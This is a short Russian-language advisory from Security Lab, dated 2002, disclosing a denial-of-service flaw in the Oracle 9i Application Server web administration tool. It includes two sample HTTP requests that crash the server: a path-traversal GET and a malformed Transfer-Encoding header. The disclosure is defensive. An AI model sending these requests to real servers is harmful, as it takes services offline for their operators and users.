Security Lab

DoS в Oracle 9i Application Server Web Cache Administration Tool

Дата публикации:08.10.2002
Всего просмотров:1128
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Oracle 9i Application Server (9iAS) позволяет удаленное администрирование через модуль Web доступа.

Злонамеренный сконструированный запрос к модулю Web Administration, приведет к аварийному завершению работы сервера. Для восстановления работы потребуется ручная перезагрузка.

Пример:

GET /../ HTTP/1.1 
host: hostname 
<ENTER> 
<ENTER> 

GET /example.html/ HTTP/1.1 
host: host name 
Transfer Encoding 
<ENTER> 
<ENTER>
Уязвимость обнаружена в Oracle Oracle 9i Application Server 9.0.2
Ссылки: http://otn.oracle.com/deploy/security/pdf/2002alert43rev1.pdf